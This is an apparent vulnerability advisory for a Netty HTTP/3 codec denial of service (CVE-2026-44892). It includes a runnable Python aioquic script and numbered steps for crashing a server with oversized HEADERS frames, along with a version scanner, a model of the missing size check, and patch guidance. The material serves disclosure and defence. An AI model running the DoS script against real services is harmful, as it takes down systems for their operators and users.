Netty HTTP/3 Codec, Unbounded Header Size Limit Denial of Service, CVE-2026-44892 (High) -DC-Jun2026-287


The vulnerability resides in the default configuration of Http3ConnectionHandler. When the application does not explicitly set HTTP3_SETTINGS_MAX_FIELD_SECTION_SIZE, Netty falls back to an unbounded limit, whereas for HTTP/1.1 and HTTP/2 it enforces an 8192-byte default. This insecure default lets a remote peer send arbitrarily large header sections over a single HTTP/3 connection: every decoded field is buffered, heap usage grows without bound, and the process eventually fails with an OutOfMemoryError, a denial of service. Because most deployments rely on Netty’s defaults, any application that uses the HTTP/3 codec without configuring a limit is exposed. The missing bound is the `maxHeaderListSize` passed through `Http3FrameCodec.newFactory`. Either a malicious client or a malicious server can trigger the condition by continuously streaming crafted HEADERS frames until the peer’s memory is exhausted and the application crashes.

DailyCVE Form:

Platform: Netty HTTP/3 Codec
Version: 4.2.0.Final–4.2.14.Final
Vulnerability: Unbounded header limit
Severity: High (DoS)
Date: 2026-06-08

Prediction: Patch available (4.2.15.Final)

What Undercode Say:

Check affected version (Maven dependency):
    mvn dependency:tree | grep netty-codec-http3

Simulate attack: send a huge HEADERS frame (Python with aioquic):
    #!/usr/bin/env python3
    import asyncio
    import sys
    from aioquic.asyncio import connect
    from aioquic.h3.connection import H3_ALPN, H3Connection
    from aioquic.quic.configuration import QuicConfiguration

    async def dos(target):
        config = QuicConfiguration(is_client=True, alpn_protocols=H3_ALPN)
        async with connect(target, 443, configuration=config) as conn:
            # H3Connection wraps the QuicConnection, not the asyncio protocol object
            h3 = H3Connection(conn._quic)
            stream_id = conn._quic.get_next_available_stream_id()
            # one ~1 MB header value: far beyond the 8192-byte limit used for HTTP/1.1 and HTTP/2
            h3.send_headers(stream_id=stream_id, end_stream=True, headers=[
                (b":method", b"GET"), (b":scheme", b"https"),
                (b":authority", target.encode()), (b":path", b"/"),
                (b"x-fake", b"a" * 10**6)])
            conn.transmit()  # flush the queued HEADERS frame onto the wire
            await conn.wait_closed()

    asyncio.run(dos(sys.argv[1]))
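
The grep above only shows whether the artifact is present; to decide whether a build is actually in the affected range, including a copy pulled in transitively by another library, the check below parses `mvn dependency:tree` output and compares each `io.netty:netty-codec-http3` version against 4.2.0.Final through 4.2.14.Final (fixed in 4.2.15.Final, as listed above). This is an added example, not code from the page or from the Netty project; the sample tree output is constructed, not captured from a real build.

```python
import re

# Added example, not from the page or the Netty project: flag netty-codec-http3
# versions inside the advisory's affected range in `mvn dependency:tree` output.
ARTIFACT = "io.netty:netty-codec-http3"
AFFECTED_LOW = (4, 2, 0)    # 4.2.0.Final, first affected release listed
AFFECTED_HIGH = (4, 2, 14)  # 4.2.14.Final, last affected; 4.2.15.Final carries the fix

# dependency:tree prints coordinates as groupId:artifactId:type:version:scope,
# e.g. "[INFO] +- io.netty:netty-codec-http3:jar:4.2.10.Final:compile"
COORD_RE = re.compile(
    re.escape(ARTIFACT) + r":jar:(\d+)\.(\d+)\.(\d+)(?:\.[\w-]+)?:\w+")


def parse_version(line: str):
    """Return (major, minor, patch) for a netty-codec-http3 coordinate, else None."""
    m = COORD_RE.search(line)
    return tuple(int(g) for g in m.groups()) if m else None


def is_affected(version) -> bool:
    """Inclusive range check on the numeric version tuple; qualifier (.Final) is ignored."""
    return AFFECTED_LOW <= version <= AFFECTED_HIGH


def scan_dependency_tree(output: str):
    """Return [(version_string, affected)] for every netty-codec-http3 line, in tree order."""
    hits = []
    for line in output.splitlines():
        v = parse_version(line)
        if v is not None:
            hits.append(("%d.%d.%d" % v, is_affected(v)))
    return hits


# Constructed sample (not a real build): the application pins the fixed codec, but a
# legacy client library still drags in an affected copy underneath it.
SAMPLE_TREE = """\
[INFO] com.example:edge-gateway:jar:1.0.0
[INFO] +- io.netty:netty-codec-http2:jar:4.2.10.Final:compile
[INFO] +- io.netty:netty-codec-http3:jar:4.2.15.Final:compile
[INFO] \\- com.example:legacy-h3-client:jar:2.3.1:compile
[INFO]    \\- io.netty:netty-codec-http3:jar:4.2.10.Final:compile
"""

if __name__ == "__main__":
    for version, affected in scan_dependency_tree(SAMPLE_TREE):
        print(f"{ARTIFACT}:{version} -> {'AFFECTED' if affected else 'ok'}")
```

Pipe real output in with `mvn dependency:tree | python3 check_h3.py` after replacing `SAMPLE_TREE` with `sys.stdin.read()`; note that Maven's nearest-wins mediation may hide the affected transitive copy unless the tree is printed with `-Dverbose`, so check the verbose tree when a shaded or fat jar is involved.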

Exploit:

  1. Establish a single HTTP/3 connection to the target.
  2. Send a `HEADERS` frame containing a massive header field (e.g., 1 GB claimed length).
  3. Repeat step 2 rapidly within the same connection.
  4. The server allocates memory for each header without checking size, triggering `OutOfMemoryError` and process crash.
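
The check that the default configuration omits, modelled in Python as an added example (this is not Netty's code, and the class and function names are hypothetical): an HTTP/3 HEADERS decoder accounts for each field as name length + value length + 32 bytes (RFC 9114 §4.2.2, the same rule HTTP/2 uses for SETTINGS_MAX_HEADER_LIST_SIZE) and rejects the section as soon as the running total passes the configured limit, so at most `limit` bytes are ever buffered per field section. Passing `None` models the unbounded default described above and in the exploit steps; passing 8192 models the bound Netty applies to HTTP/1.1 and HTTP/2. The attacker input is constructed in the script.

```python
# Added example, not Netty's code: a model of the field-section-size check an
# HTTP/3 HEADERS decoder must apply while decoding, before buffering each field.
FIELD_OVERHEAD = 32          # RFC 9114 s.4.2.2: per-field accounting overhead in bytes
NETTY_H1_H2_DEFAULT = 8192   # the default Netty enforces for HTTP/1.1 and HTTP/2
UNBOUNDED = None             # models the HTTP/3 default: no limit at all


class FieldSectionTooLarge(Exception):
    """Raised when the cumulative field-section size exceeds the configured limit."""


def field_size(name: bytes, value: bytes) -> int:
    """Uncompressed size of one field as the protocol accounts for it."""
    return len(name) + len(value) + FIELD_OVERHEAD


class HeadersDecoder:
    """Accumulates decoded fields for one HEADERS frame under max_field_section_size.

    With max_field_section_size=UNBOUNDED every field is retained regardless of
    size, so each additional field is another heap allocation the peer controls.
    """

    def __init__(self, max_field_section_size):
        self.limit = max_field_section_size
        self.fields = []
        self.bytes_retained = 0

    def on_field(self, name: bytes, value: bytes) -> None:
        size = field_size(name, value)
        # Check BEFORE retaining the field, so a section that blows the budget is
        # rejected after at most `limit` bytes have been buffered.
        if self.limit is not None and self.bytes_retained + size > self.limit:
            raise FieldSectionTooLarge(
                f"field section exceeds {self.limit} bytes after {len(self.fields)} fields")
        self.fields.append((name, value))
        self.bytes_retained += size


def attacker_fields(count: int, value_len: int):
    """Constructed attacker input: `count` junk fields, each with a value_len-byte value."""
    for i in range(count):
        yield (b"x-fake-%d" % i, b"a" * value_len)


def decode_section(limit, count, value_len):
    """Feed the attacker's fields into a decoder with the given limit.

    Returns (rejected, fields_accepted, bytes_retained).
    """
    dec = HeadersDecoder(limit)
    try:
        for name, value in attacker_fields(count, value_len):
            dec.on_field(name, value)
    except FieldSectionTooLarge:
        return True, len(dec.fields), dec.bytes_retained
    return False, len(dec.fields), dec.bytes_retained


if __name__ == "__main__":
    # 10,000 fields of 1,000 bytes: roughly 10 MB of header data on one stream.
    for limit in (UNBOUNDED, NETTY_H1_H2_DEFAULT):
        rejected, n, kept = decode_section(limit, 10_000, 1_000)
        print(f"limit={limit!s:>5}: rejected={rejected} fields={n} bytes_retained={kept}")
```

With the unbounded decoder all 10,000 fields are retained (about 10 MB for this one stream, and the attacker picks the multiplier); with the 8192-byte limit the section is rejected at the eighth field with 7,280 bytes buffered. In a real codec the rejection becomes an HTTP/3 stream error rather than a Python exception, but the property that matters is the same: the limit is enforced during decoding, before the field is stored, not after the whole section has been materialised.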

Protection:

  • Upgrade to Netty 4.2.15.Final or later:

`mvn versions:use-latest-versions -Dincludes=io.netty:netty-codec-http3`

  • If patching is impossible, manually set a strict limit via Http3Settings:
    Http3Settings settings = Http3Settings.initialSettings()
        .maxFieldSectionSize(8192);
  • Restrict network access to trusted sources only, or temporarily disable HTTP/3 support.

Impact:

  • Denial of Service – remote, unauthenticated attacker can crash any Netty HTTP/3 service using default configuration.
  • No privilege escalation; only availability is affected.
  • Common in cloud‑native apps, API gateways, or any service relying on Netty for HTTP/3.

Sources:

Reported By: github.com